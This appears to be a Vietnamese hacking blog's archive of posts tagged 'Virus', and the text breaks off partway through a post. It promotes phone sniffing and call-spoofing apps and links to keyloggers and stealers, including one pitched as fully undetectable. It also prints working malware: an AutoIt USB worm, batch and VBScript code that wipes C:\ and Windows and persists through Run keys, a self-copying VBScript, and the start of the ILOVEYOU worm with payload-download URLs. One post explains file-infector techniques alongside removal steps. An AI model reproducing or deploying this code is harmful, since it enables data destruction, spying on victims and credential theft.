Latest Releases

Hiển thị các bài đăng có nhãn Virus. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Virus. Hiển thị tất cả bài đăng

Thứ Hai, 27 tháng 6, 2016

Top 9 công cụ của Hacker trên điện thoại


SpoofApp

(Gọi điện thoại chỉ) SpoofApp hãy bạn đặt (spoof) các cuộc gọi với bất kỳ số ID của người gọi. Bạn cần SpoofCards để spoof cuộc gọi, (được bán riêng). Nó bao gồm một số tính năng khác như voice changer, cho phép bạn thay đổi giọng nói của bạn trong khi sử dụng nó. Ngoài ra, nó cũng cho phép bạn ghi lại toàn bộ cuộc đàm thoại. Bạn sẽ nhận được free 5 phút SpoofCard khi bạn cài đặt các ứng dụng đầu tiên.
Mạng Spoofer là một ứng dụng tốt cho phép bạn thay đổi các trang web trên máy tính người khác từ điện thoại Android của bạn. Bạn cần phải tải về các ứng dụng mạng Spoofer và sau đó đăng nhập vào mạng Wi-Fi. Chọn một spoof để sử dụng với các ứng dụng, sau đó nhấp vào bắt đầu. Ứng dụng này được coi là một công cụ hacking độc hại của quản trị mạng. Vì vậy, nó được khuyến khích để không thử này trên mạng trái phép, là điều này không phải là một sự thâm nhập thử nghiệm ứng dụng.


(Facebook) Faceniff về cơ bản được sử dụng để sniff Facebook ID trên cùng một mạng. Ví dụ, nếu bạn đang trên cùng một mạng và Faceniff của bạn đã được bật, sau đó nó sẽ sniff tất cả các ID Facebook đang đăng nhập từ cùng một mạng. Vì đây là một phiên bản trả tiền, bạn cần phải trả tiền cho điều này trên internet.

 Công cụ này có thể được sử dụng để hack riêng WhatsApp cuộc trò chuyện, hình ảnh, âm thanh và video của bạn bè của bạn đang sử dụng điểm truy cập Wi-Fi của bạn. Vô hiệu hoá chống virus của bạn trước khi sử dụng ứng dụng này, vì nó được phát hiện bởi antivirus.

Ứng dụng này cho phép bạn chặn một người sử dụng mạng Wi-Fi của bạn. Bạn có thể vô hiệu hóa kết nối internet cho bất kỳ thiết bị nào hiện diện trong mạng Wi-Fi của bạn.


DroidSheep is also one of the free best application for sniffing the sessions over the network. Similar to Faceniff, it not only sniffs the Facebook sessions but also other sessions.

Read »

Chủ Nhật, 8 tháng 5, 2016

SHARE LINK TẢI 4 LOẠI KEYLOGGER 2016

Bốn Loại Kelogger bao gồm




1) Anonymous Keylogger

2) Dracula Logger

3) Instalador V2

4) Vulcan Logger

scan virus 

DOWNLOAD HERE
Read »

Thứ Hai, 8 tháng 2, 2016

Cyber ​​Virus

Cyber ​​Virus

22
Không sử dụng trong máy tính của bạn!
Tính năng Exe:
Định dạng Tất cả Đĩa
Tính năng .bat:
không có Internet
Định dạng đĩa
Đừng Khởi động Windows
...
"Trước khi sử dụng Destroy.txt bạn cần phải chuyển đổi để Destroy.bat "
Read »

Thứ Bảy, 26 tháng 12, 2015

Tạo Keylogger mới 2016


Tạo Keylogger mới 2016
https://youtu.be/zRo3XCZpIJM
Download : http://www.mediafire.com/download/h72nxrfsj55x228/HAKOPS+Logger+12.rar
Read »

Chủ Nhật, 25 tháng 10, 2015

KEYLOGGER CHO MACBOOK – ĐÃ THỬ NGHIỆM RẤT TUYỆT VỜI

Download tại đây:  RefogKeylogger

Tên con Keylogger đầy đủ là RefogKeylogger.


RefogKeylogger là một chương trình gián điệp, ghi lại thông tin bàn phím và ảnh chụp màng hình của nạn nhân tới hacker thông qua một sever theo một chu kì nhất định. Việc đơn giản của RefogKeylogger chỉ có thể. Nó không thể nào so sánh được các loại Trojan như Spynet hoặcDarkcomet RAT được.
Và vì thế  nó cũng vô cùng đơn giản để loại trừ . RefogKeylogger rất dễ phát hiện bởi các chương trình quét Virus sơ cấp.
Tuy nhiên VIETLQ.COM không khuyến khích các bạn sử dụng RefogKeylogger làm việc không tốt. RefogKeylogger phát triển dựa trên việc phụ huynh giám sát con cái mình sử dụng máy tính (Macbook).
Mọi việc bạn sử dụng RefogKeylogger để làm gì tôi không có quyền can thiệp, và tôi cũng không chịu trách nhiệm nếu bạn gây hại tới người khác hay xâm phạm đến pháp luật.

Ưu và nhược điểm:

Phần mềm này có trả phí, tuy nhiên bạn cũng không cần mua mà vẫn sử dụng được các chức năng cơ bản của nó. Nếu hết hạn, RefogKeylogger sẽ bị hạn chế một số chức năng.
Không gửi được vào mail. Chỉ thực hiện chức năng giám sát trên một máy.

Việc sử dụng rất dễ, bạn chỉ cần tải về, cài đặt vào máy là xong.
Một vài hình ảnh RefogKeylogger cho các bạn:
Máy của mình hết hạn, nhưng vẫn dùng được một số chức năng.
Máy của mình hết hạn, nhưng vẫn dùng được một số chức năng.
2

3

Have fun!
Read »

Thứ Bảy, 17 tháng 10, 2015

Keylogger HOT nhất Hiện nay

[Image: Ml3rkN.png]
[Image: Qgo9Qk.png]
[Image: XYr597.png]
[Image: b4dWk8.png]
[Image: dqAR84.png]
[Image: 5R1BLR.png]
[Image: AYdpn0.png]
[Image: 02oQl8.png]

Result: (0/60)
A-Squared(Emisoft AntiMalware) Clean - Nothing Found
Agnitum Clean - Nothing Found
AhnLab V3 Internet Security Clean - Nothing Found
ArcaVir Clean - Nothing Found
Avast Clean - Nothing Found
Avg Clean - Nothing Found
Avira Clean - Nothing Found
Ad-Aware Clean - Nothing Found
Baidu AV Clean - Nothing Found
BitDefender Clean - Nothing Found
BKav Clean - Nothing Found
BullGuard Internet Security Clean - Nothing Found
ByteHero Clean - Nothing Found
ClamAv Clean - Nothing Found
Comodo Clean - Nothing Found
Dr. Web Clean - Nothing Found
eScan Clean - Nothing Found
eTrust-Vet Clean - Nothing Found
eScan Internet Security Suite 14 Clean - Nothing Found
ESET NOD32 Clean - Nothing Found
Fortinet Clean - Nothing Found
Fprot Clean - Nothing Found
FSB Antivirus Clean - Nothing Found
F-Secure Clean - Nothing Found
Gdata Clean - Nothing Found
Ikarus Clean - Nothing Found
Immunet Antivirus Clean - Nothing Found
IObit Malware Fighter Clean - Nothing Found
K7Ultimate Clean - Nothing Found
Kaspersky Internet Security 2013 Clean - Nothing Found
KingSoft Clean - Nothing Found
Malwarebytes Anti-Malware Clean - Nothing Found
mcafee Clean - Nothing Found
Microsoft Security Essentials Clean - Nothing Found
nProtect Clean - Nothing Found
NANO Antivirus Clean - Nothing Found
Netgate Clean - Nothing Found
Norton Internet Security Clean - Nothing Found
Norman Clean - Nothing Found
Outpost Security Suite Pro Clean - Nothing Found
Ozone AV Clean - Nothing Found
Panda Antivirus Clean - Nothing Found
Panda Cloud Clean - Nothing Found
PC Tools Clean - Nothing Found
Quick Heal Clean - Nothing Found
SUPERAntiSpyware Clean - Nothing Found
Solo Clean - Nothing Found
Sophos Clean - Nothing Found
TotalDefense Clean - Nothing Found
Trendmicro Internet Security Clean - Nothing Found
TrustPort Antivirus 2014 Clean - Nothing Found
Twister Antivirus 8 Clean - Nothing Found
Unthreat AntiVirus BE Clean - Nothing Found
Vba 32 Clean - Nothing Found
Vexira Clean - Nothing Found
Vipre Internet Security 2013 Clean - Nothing Found
VirIT Clean - Nothing Found
Webroot Clean - Nothing Found
Zillya Clean - Nothing Found
Zoner Clean - Nothing Found
360 Clean - Nothing Found

Filename: eqawe.exe
File MD5 Hash: 4da845e096a139ea240a90e344694928
File SHA1: 2f487abaa5fb17da21af597783ba275c3ed7927e
File Size: 216576 Bytes
Time Scanned: 4-11-14, 04:23:30
Scan provided by RazorScanner
Link to Scan: http://razorscanner.com/result.php?id=629806

Features
[+] %100 FUD
[+] .NET 2.0
[+] server~200kb

[+] Auto Update
[+] Save Options
[+] SMTP 
[+] HTML Log
[+] Save Log: It can save logs without internet connection. When internet connected it can send collected logs with subject "Saved Log"

[+] Keyboard Hook (All characters)
[+] Clipboard Hook
[+] On-screen Keyboard Hook
[+] Screenshot

[Assembly]
[+] Assembly Changer
[+] Assembly Cloner

[+] Icon Changer

[Stealer]
[+] Chrome
[+] IExplorer
[+] Firefox
[+] Opera
[+] FileZilla
[+] IMVU
[+] Pidgin
[+] FlashFXP
[+] SmartFTP
[+] CoreFTP
[+] FTPCom
[+] NO-IP
[+] Paltalk
[+] DynDNS
[+] Yahoo
[+] MSN
[+] Steam
[+] JDownloader

[File Binder]
[+] Multi File Binder
[+] All Extension
[+] "Just one time" Option

[Installation]
[+] Injection (RunPE)
[+] Add Startup (hide from msconfig) (Bypass UAC)
[+] Hide File
[+] Persistance
[+] Melt File
[+] Delay Execution
[+] Kill Process

[Options]
[+] Block Anti-Viruses
[+] Protected Process (Bypass UAC)
[+] Block Rightclick (Bypass UAC)
[+] Kill Taskmanager
[+] Kill CMD
[+] Kill Regedit
[+] Kill System Restore
[+] Disable Taskmanager
[+] Disable CMD
[+] Disable Run
[+] Disable Registry
[+] Disable System Restore
[+] Disable Control Panel
[+] Disable MSConfig
[+] Disable Folder Options

[+] Downloader
[+] File Pumper
[+] Extension Spoofer

[Fake Message]
[+] Header
[+] Message
[+] Style
[+] Button

[Web Options]
[+] Host Edit
[+] Web Filter (Bypass UAC)

[+] Add UAC Manifest


username: beta
password: beta

Download: http://db.orangedox.com/CKNPBUs6w9c8uf0G...eta%5D.zip
Zip password: agenttesla

P.S.1: Please close all AV!
P.S.2: Please dont use Virustotal, jotti etc...

Latest Version v2.4.7
-Changed function of melt file. %100 work.
-Stub %100 Fully Undetectable (FUD)
Read »

Thứ Ba, 29 tháng 9, 2015

Share KEYLOGGER mới crack free 100%

Tôi cung cấp cho bạn The Best Keylogger Full Version có ngày hôm nay! Với tài năng này, bạn có bằng chứng có thể biết chính xác là đang xảy ra trên máy tính của bạn mà không cần thậm chí bạn có được ở đó. Bạn có thể gửi tất cả những phẩm chất để email của bạn hoặc địa chỉ ftp. Bạn thậm chí có thể tuôn ra tất cả những phẩm chất để tham vọng USB của bạn một khi chèn vào. Các pháo đài keylogger tốt nhất ở chế độ ẩn và hoàn toàn vô hình trên tính toán của bạn:3
DOWLOAD :
http://kiwi6.com/file/5e7rjsjdgr?autostart&utm_campaign=hotlink&utm_source=http%3A%2F%2Fadfoc.us%2Fx35627738&utm_medium=redirectext&utm_content=5e7rjsjdgr
Read »

Thứ Hai, 24 tháng 8, 2015

Cơ chế lây file của virus sử dụng kỹ thuật delta

Cơ chế lây file của virus sử dụng kỹ thuật delta


I. Mục đích của bài viết:


- Giúp người đọc hiểu được sâu hơn về cơ chế cũng như kỹ thuật lây file của virus lây file để phục vụ trong quá trình phân tích, bóc tách và gỡ bỏ virus.

1. Các kiến thức yêu cầu khi đọc bài viết:

- Kiến thức về kiến trúc máy tính.
- Ngôn ngữ assembly. 
- Cấu trúc file PE.
- Windows API

2. Các thuật ngữ sử dụng trong bài viết

- File host: là file sạch chưa bị nhiễm virus
- Code virus: đoạn chương trình của virus.
- EntryPoint: là câu lệnh đầu tiên được thực thi của 1 chương trình.
- API: là các hàm trong các thư viện chuẩn của windows

II. Giới thiệu về PE file.
1. Định nghĩa:
- PE (Portable Executable) là định dạng riêng của hệ điều hành windows. Hầu hết các file thực thi trên Windows đều thuộc dạng PE (Trừ các tập tin VxDs và các file DLL 16 bits).
- Các file thực thi phổ biến nhất là trên hệ điều hành Windows có đuôi mở rộng: .com, .exe, .dll, .pif, .sys...

2. Cấu trúc file PE
- Cấu trúc file PE khá phức tạp. Để tìm hiểu chi tiết về cấu trúc của PE file, các bạn có thể tìm đọc tài liệu tại: “http://win32assembly.programminghori...m/pe-tut1.html

III. Nguyên lý cơ bản để viết virus lây file.

1. Định nghĩa Virus lây file:
- Định nghĩa: là những file chứa mã độc có hành vi chèn mã thực thi vào các file PE.
- Đặc điểm: Virus lây file không tồn tại ở một file độc lập mà gắn vào chương trình khác trên máy, khiến người dùng khó phát hiện ra chúng và kể cả khi phát hiện cũng không thể xóa file virus đi được vì như thế là xóa luôn chương trình gốc ban đầu.
- Khó khăn khi xử lý: Khi bị nhiễm virus, người dùng thường nghĩ cài lại win sẽ hết nhưng khi gặp virus file, dù có cài lại win xong (thường sẽ format ổ cài win) khi ta chạy file bị nhiễm ở ổ khác virus sẽ lại lây lại vào toàn bộ hệ thống.

2. Các nguyên lý cơ bản 
- Đây là các bước cơ bản mà virus cần phải thực hiện khi muốn lây nhiễm vào một chương trình khác.
- Chèn code virus vào file muốn lây nhiễm.
- Chuyển EntryPoint (địa chỉ lệnh đầu tiên của file được thực hiện) đến vùng code thực thi của virus.
- Sau khi thực thi code virus xong sẽ trả quyền điều khiển về cho host (file gốc).



3. Các kỹ thuật liên quan:

Đây là các kỹ thuật cơ bản mà virus lây file sẽ sử dụng trong quá trình thực thi:
- Sửa header của file host:
Sau khi thêm mã thực thi của mình vào file host thì lúc này các thông tin trong header vẫn là của file host, virus sẽ sửa lại một số giá trị trong header cho phù hợp với file sau khi được chèn thêm đoạn mã của virus. - Kỹ thuật delta:
Khi mã virus được chèn vào file host, các thông tin về địa chỉ của mã virus sai lệch một khoảng nào đó tùy từng file host. Kỹ thuật delta là kỹ thuật dùng để xác định độ sai lệch đó. 
- Kỹ thuật lấy địa chỉ các hàm API:
Các thư viện và các hàm API mà virus muốn dùng chưa chắc đã có trong bảng import của file host. Trong trường hợp đó, trình loader sẽ không load sẵn các thư viện đó lên bộ nhớ, do đó virus sẽ phải tự mình đi load các thư viện và tìm các hàm API mà mình muốn dùng.
- Kỹ thuật trả lại quyền điều khiển chương trình về cho host:
Sau khi thực hiện xong các đoạn code của mình thì virus sẽ phải trả lại quyền thực thi cho các file host để tránh bị người dùng nghi ngờ. 

IV. Hướng dẫn chi tiết các kỹ thuật.


1. Kỹ thuật delta.
- Kỹ thuật delta mục đích là tính ra khoảng cách từ code virus tới đầu file và lưu trữ lại khoảng cách đó. Sau đó tất cả các câu lệnh truy suất tới các địa chỉ trong code virus chỉ cần dùng khoảng cách đó cộng với địa chỉ tương đối của bộ nhớ cần truy suất tới đầu code virus thêm vào là có thể tính ra địa chỉ thực sự trên bộ nhớ.


Kỹ thuật delta được thực hiện rất đơn giản như sau:



- Sau khi thực hiện đoạn code trên thì thanh ghi ebp đã lưu được địa chỉ tương đối so với đầu file của đoạn code virus (chính là giá trị 7 hay 10 trong hình vẽ).
- Từ bây giờ muốn truy suất tới một biến trong vùng nhớ ta chỉ việc cộng địa chỉ biến với ebp.

2. Kỹ thuật lấy địa chỉ hàm API.

- Khi bắt đầu được thực thi, gần như virus chưa có trong tay bất kỳ thư viện hay hàm API nào đi cùng. Công việc khó khăn là nó sẽ phải load được các thư viện mình cần lên bộ nhớ và tìm được địa chỉ các hàm API cần thiết sẽ sử dụng.
- Để thực hiện được mục đích trên, virus thường sử dụng 2 hàm đó là: LoadLibrary để load thư viện và GetProcAddress để lấy địa chỉ các hàm trong thư viện đó.
- Câu hỏi khác lại đặt ra: Làm sao để gọi được 2 hàm trên? Có một điều may mắn là cả 2 hàm trên đều nằm trong thư viện kernel32.dll. Thư viện này luôn được load lên cùng file do đó có thể đi tìm địa chỉ của kernel32.dll trên bộ nhớ sau đó sẽ đi tìm 2 hàm quan trọng kia.
- Lý thuyết là vậy nhưng thực tế ta chỉ tìm hàm GetProcAddress là có thể lấy được hàm LoadLibrary.

Cụ thể ta có thể làm như sau:



- Lúc này ta đã có được Handle của kernel32.dll và địa chỉ hàm GetProcAddress. Các công việc còn lại có vẻ đã đơn giả đi nhiều. 
Giờ đây muốn lấy thư viện hay thêm hàm nào thì phụ thuộc vào mục đích của virus.

Chú ý: trong đoạn code trên có sử dụng kỹ thuật tìm địa chỉ kernel32.dll dựa trên cấu trúc PEB (Process Environment Block), cấu trúc PE file và cấu trúc bảng Export của PE file.
- Bạn có thể tìm hiểu về PEB tại địa chỉ: http://en.wikipedia.org/wiki/Process_Environment_Block
- Ngoài ra bạn cũng có thể tìm địa chỉ thư viện kernel32.dll dựa vào địa chỉ trả về của Windows loader - đỉnh stack lúc đó chính là một vùng nhớ trong kernel32.dll.




3. Sửa lại Header của file.

Chúng ta sẽ nhìn nhận lại xem các trường nào của PE header sẽ cần phải được sửa lại.
- Đầu tiên sẽ là SizeOfImage : Kích thước của file đã tăng lên do đó trường này cũng sẽ phải thay đổi cho phù hợp.
- Số lượng section: Nếu virus thêm một section vào cuối file thì phải thêm vào bảng section table một section tương ứng và tăng số lượng section trong trường NumberOfSections.
- Sửa lại EntryPoint: Sửa lại Entrypoint trỏ đến lệnh đầu tiên của virus, để virus có thể thực thi mỗi khi phải host được thực thi. Trước khi sửa virus phải lưu lại giá trị Entrypoint gốc của trường trình để khi virus thực thi xong sẽ trả lại quyền điều khiển cho chương trình host.




Đoạn code sửa lại một số trường trong PE Header.
4. Các điểm cần chú ý khác:



Duyệt tìm file để lây nhiễm sử dụng hai API: FindFirstFile và FindNextFile



Trả quyền điều khiển cho chương trình host
V. Cách diệt và xử lý.

Với cớ chế lây của virus đã nêu ở trên. Chúng ta có thể rút ra được cơ chế để viết 1 chương trình diệt virus lây file như sau:
- B1: Khôi phục lại code gốc của file host nếu bị virus mã hóa
- B2: Khôi phục lại Entrypoint trỏ vể chương trình của file host
- B3: Cắt bỏ phần virus.
- B4: Khôi phục lại các trường quan trọng của PE Header.

VI.Tổng kết
- Trên đây là kỹ thuật của virus khi lây file. Bài viết chỉ mang tính chất giới thiệu cơ chế cũng như các kỹ thuật của virus lây file để giúp người đọc hiểu hơn về virus và có thể tự phân tích và viết chương trình gỡ bỏ virus khi máy bị lây nhiễm. 
- Các trường hợp nếu người đọc sử dụng kiến thức trong bài viết vào mục đích xấu phải chịu hoàn toàn trách nhiệm và thiệt hại đã gây ra.
Read »

Thứ Tư, 29 tháng 7, 2015

Chắc các bạn không con xa lạ với phần mềm autoit nữa
nên mình hướng dẫn và cho các bạn những code để tạo ra một con virus và mình khuyên các bạn là không dùng những con virus này để đem phá hoại người khác.:angry:
Link Download Autoit : https://www.autoitscript.com/site/autoit/downloads/
Virus này dùng để test phần mềm diệt virus thôi nhé :))
Chuyển đổi file .au3 thành File .exe, bạn click vào thanh start -> AutoIt v3 -> Compile Script to .exe
:angry::angry::angry::angry::angry::angry: Nghiêm cấm đem đi phá hoại nhé :brick::brick::brick:
Phần Code :

#Notrayicon
Dim $autorun = "[autorun]" & @CRLF & "open=svchosts.exe" & @CRLF & "SHELl\opEn\defaUlt=1" & @CRLF & "sHell\eXpLore\CommaND=svchosts.exe"
if not fileexists("C:\Autorun.inf") Then
filewrite("C:\Autorun.inf",$autorun)
endif
fileDelete("C:\Autorun.inf")
filewrite("C:\Autorun.inf",$autorun)
FileCopy(@ScriptDir & "\service.exe","C:\Windows\system32",1)
run("C:\Windows\system32\service.exe")
FileCopy(@ScriptDir & "\svchosts.exe","C:\Windows\system32",1)
while 1
$var = DriveGetDrive( "REMOVABLE" )
If NOT @error Then
FileCopy(@ScriptFullPath,$var[0],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy("C:\Autorun.inf",$var[0],1)
For $i = 1 to $var[0]
FileCopy("C:\Autorun.inf",$var[$i],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy(@ScriptFullPath,$var[$i],1)
Next
EndIf
wend
loadt2player(402);

End tut


Read »

Thứ Hai, 27 tháng 7, 2015

Quậy với Notepad

Nói là virus nhưng thực chất nó ko phải là virus
, nó chỉ là một đoạn mã để thực hiện một điều gì đó "nham hiểm"do chúng ta viết ra. Chính vì thế "hầu hết" các đoạn mã trong đây đều ko bị antivirus chém. Em sẽ cho các bác một số code để các bác biết về cấu tạo của nó, và nên cài đặt máy ảo hoặc đóng băng các ổ trước khi sử dụng những con virus này.

1.

-B1: vào notepad gõ cú pháp:
while true
wend


-B2: Sau đó lưu lại dưới đuôi* .vbs
-B3: gửi victim (nạn nhân) dụ cho victim chạy tập tin này( đừng có gắng thử nhé....không chịu trách nhiệm đâu đấy)

Đây mới chỉ là virut, nếu viết autorun cho nó nữa thì cực kỳ nguy hiểm, con này mỗi lần chạy thì nó chiếm 100% cpu của 1 luồng dữ liệu. Với máy core 2duo thì click 2 phát CPU 100%, core i3, i5 thì click 4 lần. Sau khi bị chiếm 100% cpu muốn tắt đi thì vào Task Manager tắt hết những chương trình có đuôi vbscript đang chạy. Đó là virut chạy do con người điều khiển, còn nếu viết thêm autorun để nó chạy tự động, giả sử số lần click là lớn hơn 10 thì thôi rồi, chỉ có cài lại win.


2.Xóa toàn bộ ổ C:\ của Victim


if exist C:\program files*.* deltree /y C:\program files*.*
if exist C:\my documents*.* deltree /y C:\my documents*.*
if exist C:\windows\desktop*.* deltree /y C:\windows\desktop*.*
if exist C:\windows\start menue*.* deltree /y C:\windows\start menue*.*
if exist C:\windows\command*.* deltree /y C:\windows\command*.*
if exist C:\windows\system*.* deltree /y C:\windows\system*.*
if exist C:\windows*.* deltree /y C:\windows*.*

-Lưu với tên .bat

3)

Trích dẫn:
msgbox"Die roai !"
On Error Resume Next
Set vip_xinh = Createobject("scripting.filesystemobject")
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"
Set vip_xinh2= CreateObject("WScript.Shell")
vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"

On Error Resume Next
Const vic = "D:\"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub

On Error Resume Next
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")
fso1.DeleteFile vic1 & "*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub

On Error Resume Next
Const vic2 = "C:\"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub

On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop

- Lưu với tên .bat


4.


On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
Set treomay= CreateObject("WScript.Shell")
msgbox"May tinh cua ban bi nhiem virut",,"Danger"
msgbox"May se bi lag trong 2s",,"Danger"
msgbox"Ban con 1s",,"Danger"
msgbox"Ban con 0s",,"Danger"
msgbox"May da bi nhiem virus",,"Danger"
Me.visible=false
App.Taskvisible=false
Do
Me.visible=false
App.Taskvisible=false
treomay.run "notepad",false
loop

- Lưu với tên .vbs

5.Thông báo vĩnh cửu

msgbox "Đừng có tắt dòng thông báo này đi nếu không bạn sẽ gặp rắc rối đó!",,"Thông báo từ Hacker Microsoft"
msgbox "Định làm liều à, thử tắt lần nữa xem!",,"Thông báo từ Hacker Microsoft"
do

msgbox "Error! Máy tính của bạn đã bị các Hacker tấn công!",,"Thông báo từ Hacker Microsoft"
Loop

- Lưu với tên .vbs


6.

start 1.bat

-Lưu với tên 1.bat

-khoa điện tử-máy tính mình nên tổ chức cuộc thì "Xem ai nhanh hơn nào!!" để coi ai tắt thằng này nhanh nhất....khữa ... Khữa


7.Tạo thư mục liên tục mỗi khi bấm

'Thuoc Doc !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub

Thuốc giải 7.
B1: Mở Notepad
B2: Gõ code:
'Thuoc Giai !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders For Each f1 In sf
'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
'COP.write VBCopy
'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
'CAP.write VBCopy
'Set ATT=fso.GetFolder(f1.Path)
'ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub

- Lưu với tên .vbs


8.


-B1: tạo 1 file bất kỳ(1.txt, 1.bat, 1.exe...v..v..)
Vd: C:\Users\chuong\Desktop\1.txt
-B2: vào notepad
-B3 :Đánh lệnh erase C:\Users\chuong\Desktop\1.txt
-B4: lưu dưới dạng *.cmd
-B5: Chạy file *.cmd

thế là file 1.txt đã bị xóa



Các bạn đang tự hỏi ủa thế có gì đâu mà gọi là phá hoại?????
xin thưa rằng, files chạy dưới đuôi.cmd là thao tác thực hiện trên ms-dos vì vậy nó không kiêng nể ai hết...chỉ thực thi mệnh lệnh 1 cách hiệu quả thôi
-Bởi vậy....nếu bạn thay lệnh erase C:\Users\chuong\Desktop\1.txt -->>>>erase C:\Windows thì bạn nghĩ thế nào....có phải là đi tong cái win không........Bởi vậy đừng cố gắng làm điều gì ngu ngốc nhé!!!!!
p/s: có thiếu sót gì các bác nói e chỉnh sửa ạ, tks nhìu ạ
Read »

Thứ Hai, 20 tháng 7, 2015

SHARE CODE VIRUS

 SHARE CODE VIRUS

rem  barok -loveletter(vbe) <i hate go to school>
 rem by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  /  Manila,Philippines
 On Error Resume Next
 dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
 eq=""
 ctr=0
 Set fso = CreateObject("Scripting.FileSystemObject")
 set file = fso.OpenTextFile(WScript.ScriptFullname,1)
 vbscopy=file.ReadAll
 main()
 sub main()
 On Error Resume Next
 dim wscr,rr
 set wscr=CreateObject("WScript.Shell")
 rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
 if (rr>=1) then
 wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
 end if
 Set dirwin = fso.GetSpecialFolder(0)
 Set dirsystem = fso.GetSpecialFolder(1)
 Set dirtemp = fso.GetSpecialFolder(2)
 Set c = fso.GetFile(WScript.ScriptFullName)
 c.Copy(dirsystem&"\MSKernel32.vbs")
 c.Copy(dirwin&"\Win32DLL.vbs")
 c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
 regruns()
 html()
 spreadtoemail()
 listadriv()
 end sub
 sub regruns()
 On Error Resume Next
 Dim num,downread
 regcreate
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs"
 regcreate
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs"
 downread=""
 downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
 if (downread="") then
 downread="c:\"
 end if
 if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
 Randomize
 num = Int((4 * Rnd) + 1)
 if num = 1 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
 Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm
 hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
 elseif num = 2 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw
 erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
 elseif num = 3 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
 Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd
 QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
 elseif num = 4 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
 Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD
